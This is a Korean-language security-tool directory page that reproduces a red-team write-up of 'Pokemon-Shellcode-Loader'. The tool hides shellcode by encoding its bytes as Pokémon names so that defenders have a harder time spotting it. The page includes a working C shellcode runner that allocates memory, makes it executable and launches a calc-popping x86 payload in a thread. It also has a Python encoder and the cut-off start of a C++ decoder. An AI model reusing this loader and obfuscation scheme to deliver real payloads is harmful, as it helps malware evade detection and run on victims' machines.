Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Pokemon-Shellcode-Loader — 하루 종일 hex만 보면서 '\x41'을 띄우는 게 지겨우신가요? 차라리 루기아/파이리를 보고 싶으신가요? 해결책을 가져왔습니다. | Kitploit
도구/GitHubGitHub/techryptic/pokemon-shellcode-loader
Payload GenerationShellcodeRed TeamingShellcode GenerationPayload DevelopmentAdversarial Attack
GitHubtechryptic/pokemon-shellcode-loader

Pokemon-Shellcode-Loader

하루 종일 hex만 보면서 '\x41'을 띄우는 게 지겨우신가요? 차라리 루기아/파이리를 보고 싶으신가요? 해결책을 가져왔습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
12814564년 전Kitploit 검토 완료

포켓몬 셸코드 로더

하루 종일 hex만 보다가 '\x41'을 꽂아넣는 게 지겹나요? 차라리 Lugia/Charmander를 보고 싶나요? 해결책을 가져왔습니다. @Checkymander가 포켓몬 이름으로 셸코드 로더를 만드는 트윗을 올렸습니다. 블루 팀을 골탕 먹이기에 아주 재미있는 프로젝트인데, POC가 없었습니다! (적어도 제가 마지막으로 확인했을 때는요)

참고 #1 업데이트된 코드는 제 GitHub에 있습니다: https://github.com/Techryptic/Pokemon-Shellcode-Loader

참고 #2 GitBooks: https://techryptic.gitbook.io/pokemon-shellcode

참고 #3 GitPages: https://techryptic.github.io/2022/07/28/Pokemon-Shellcode-Loader

인스트럭션을 로드해 보자

이 작업을 수행하는 방법은 여러 가지입니다. 셸코드를 살펴보면 0x00-0xFF의 hex 값들, 즉 십진수로는 0-256에 해당하는 값들의 연속입니다. 우리가 선택할 수 있는 포켓몬은 256개보다 훨씬 많습니다.

위의 포켓몬 차트를 보면 #001인 BULBASAUR를 0x01로 변환할 수 있습니다(첫 번째 0은 버립니다). 마찬가지로 CHARMANDER는 0x04로 표현되는 식입니다. 행운의 null 바이트 0x00은 포켓몬 #257, BLAZIKEN에 대응시킬 수 있습니다!

셸코드를 포켓몬 셸코드로 변환하는 것은 간단합니다. 그렇다면 포켓몬 셸코드를 어셈블리로 변환하는 것은 어떨까요?! .ASM 안에 배열(Array)을 둘까요? C 코드로? 아니면 외부에서 가져올까요?

진행할 수 있는 방향이 정말 많습니다!

배열로 할 것인가, 말 것인가

데이터가 필요합니다. 먼저, 포켓몬의 번호와 이름을 모두 포함하는 두 곳을 발견했습니다:

https://gist.github.com/armgilles/194bcff35001e7eb53a2a8b441e8b2c6

그리고 포켓몬의 이름만 있는 또 다른 곳도 있습니다. 긴 문자열을 옮겨오지 않고도 특정 포켓몬의 배열 인덱스 위치를 얻을 수 있기 때문에 더 유용할 수 있습니다.

https://github.com/sindresorhus/pokemon/blob/main/data/en.json

기준(baseline)은 무엇인가?

일반적인 POP CALC 셸코드를 가져와서 C 코드를 적용해 보았습니다.

#include <windows.h>

void main() {
    void* exec;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;
    // Shellcode
    unsigned char payload[] =
		"\x50\x53\x51\x52\x56\x57\x55\x89"
		"\xe5\x83\xec\x18\x31\xf6\x56\x6a"
		"\x63\x66\x68\x78\x65\x68\x57\x69"
		"\x6e\x45\x89\x65\xfc\x31\xf6\x64"
		"\x8b\x5e\x30\x8b\x5b\x0c\x8b\x5b"
		"\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10"
		"\x89\x5d\xf8\x31\xc0\x8b\x43\x3c"
		"\x01\xd8\x8b\x40\x78\x01\xd8\x8b"
		"\x48\x24\x01\xd9\x89\x4d\xf4\x8b"
		"\x78\x20\x01\xdf\x89\x7d\xf0\x8b"
		"\x50\x1c\x01\xda\x89\x55\xec\x8b"
		"\x58\x14\x31\xc0\x8b\x55\xf8\x8b"
		"\x7d\xf0\x8b\x75\xfc\x31\xc9\xfc"
		"\x8b\x3c\x87\x01\xd7\x66\x83\xc1"
		"\x08\xf3\xa6\x74\x0a\x40\x39\xd8"
		"\x72\xe5\x83\xc4\x26\xeb\x41\x8b"
		"\x4d\xf4\x89\xd3\x8b\x55\xec\x66"
		"\x8b\x04\x41\x8b\x04\x82\x01\xd8"
		"\x31\xd2\x52\x68\x2e\x65\x78\x65"
		"\x68\x63\x61\x6c\x63\x68\x6d\x33"
		"\x32\x5c\x68\x79\x73\x74\x65\x68"
		"\x77\x73\x5c\x53\x68\x69\x6e\x64"
		"\x6f\x68\x43\x3a\x5c\x57\x89\xe6"
		"\x6a\x0a\x56\xff\xd0\x83\xc4\x46"
		"\x5d\x5f\x5e\x5a\x59\x5b\x58\xc3";
    unsigned int payload_len = 205;
    exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlMoveMemory(exec, payload, payload_len);
    rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
    WaitForSingleObject(th, -1);
}

나쁘지 않습니다. 악의적인 행위를 하는 것은 아니지만, 그래도... 나쁘지 않네요.

셸코드 -> Pokemon_Shellcode

간단한 스크립트 하나가 셸코드 바이트 객체(Object)를 포켓몬 셸코드로 변환합니다.

import json

shellcode = (b"\x41\x42\x20\x43")

#Do not edit below
PokemonList = ["Missingno","Bulbasaur","Ivysaur","Venusaur","Charmander","Charmeleon","Charizard","Squirtle","Wartortle","Blastoise","Caterpie","Metapod","Butterfree","Weedle","Kakuna","Beedrill","Pidgey","Pidgeotto","Pidgeot","Rattata","Raticate","Spearow","Fearow","Ekans","Arbok","Pikachu","Raichu","Sandshrew","Sandslash","NidoranF","Nidorina","Nidoqueen","NidoranM","Nidorino","Nidoking","Clefairy","Clefable","Vulpix","Ninetales","Jigglypuff","Wigglytuff","Zubat","Golbat","Oddish","Gloom","Vileplume","Paras","Parasect","Venonat","Venomoth","Diglett","Dugtrio","Meowth","Persian","Psyduck","Golduck","Mankey","Primeape","Growlithe","Arcanine","Poliwag","Poliwhirl","Poliwrath","Abra","Kadabra","Alakazam","Machop","Machoke","Machamp","Bellsprout","Weepinbell","Victreebel","Tentacool","Tentacruel","Geodude","Graveler","Golem","Ponyta","Rapidash","Slowpoke","Slowbro","Magnemite","Magneton","Farfetchd","Doduo","Dodrio","Seel","Dewgong","Grimer","Muk","Shellder","Cloyster","Gastly","Haunter","Gengar","Onix","Drowzee","Hypno","Krabby","Kingler","Voltorb","Electrode","Exeggcute","Exeggutor","Cubone","Marowak","Hitmonlee","Hitmonchan","Lickitung","Koffing","Weezing","Rhyhorn","Rhydon","Chansey","Tangela","Kangaskhan","Horsea","Seadra","Goldeen","Seaking","Staryu","Starmie","Mr. Mime","Scyther","Jynx","Electabuzz","Magmar","Pinsir","Tauros","Magikarp","Gyarados","Lapras","Ditto","Eevee","Vaporeon","Jolteon","Flareon","Porygon","Omanyte","Omastar","Kabuto","Kabutops","Aerodactyl","Snorlax","Articuno","Zapdos","Moltres","Dratini","Dragonair","Dragonite","Mewtwo","Mew","Chikorita","Bayleef","Meganium","Cyndaquil","Quilava","Typhlosion","Totodile","Croconaw","Feraligatr","Sentret","Furret","Hoothoot","Noctowl","Ledyba","Ledian","Spinarak","Ariados","Crobat","Chinchou","Lanturn","Pichu","Cleffa","Igglybuff","Togepi","Togetic","Natu","Xatu","Mareep","Flaaffy","Ampharos","Bellossom","Marill","Azumarill","Sudowoodo","Politoed","Hoppip","Skiploom","Jumpluff","Aipom","Sunkern","Sunflora","Yanma","Wooper","Quagsire","Espeon","Umbreon","Murkrow","Slowking","Misdreavus","Unown","Wobbuffet","Girafarig","Pineco","Forretress","Dunsparce","Gligar","Steelix","Snubbull","Granbull","Qwilfish","Scizor","Shuckle","Heracross","Sneasel","Teddiursa","Ursaring","Slugma","Magcargo","Swinub","Piloswine","Corsola","Remoraid","Octillery","Delibird","Mantine","Skarmory","Houndour","Houndoom","Kingdra","Phanpy","Donphan","Porygon2","Stantler","Smeargle","Tyrogue","Hitmontop","Smoochum","Elekid","Magby","Miltank","Blissey","Raikou","Entei","Suicune","Larvitar","Pupitar","Tyranitar","Lugia","Ho-Oh","Celebi","Treecko","Grovyle","Sceptile","Torchic"]
Poke_Shellcode = []
for x in shellcode:
	Poke_Shellcode.append(PokemonList[x])
print(json.dumps(Poke_Shellcode))

위의 셸코드를 가져오면:

\x00\x31\xc0\x50\x68\x2f\x2F

다음과 같이 변환됩니다:

재미있는 사실: 포켓몬 이름을 해당 번호(BULBASAUR = #1, 즉 0x01)와 일치시키고 싶었기 때문에 0x00/null 바이트를 무언가로 채워야 했습니다. MISSINGNO보다 더 잘 어울리는 게 있을까요?!

또 다른 문제는 Farfetch'd라는 포켓몬에 아래와 같이 아포스트로피가 있다는 것입니다. 간단한 해결책은 아포스트로피를 제거하고 Farfetchd라고 부르는 것입니다.

마지막으로, 기호를 제거하면 이름이 같아지는 두 포켓몬도 있습니다. 이 둘에 대한 해결책은 하나에는 F(암컷)를, 다른 하나에는 M(수컷)을 붙이는 것이었습니다.

C++ 함수

#include <iostream>
#include <string>
#include <Bits.h>
using namespace std;

// Created by: Techryptic
// @Tech

string indexNumberToHexa(int number);
void reverse_String(string& str, int last_index, int starting_index);
void printAscii(unsigned char* index_to_hexa_array, int counter_s);
도구 다운로드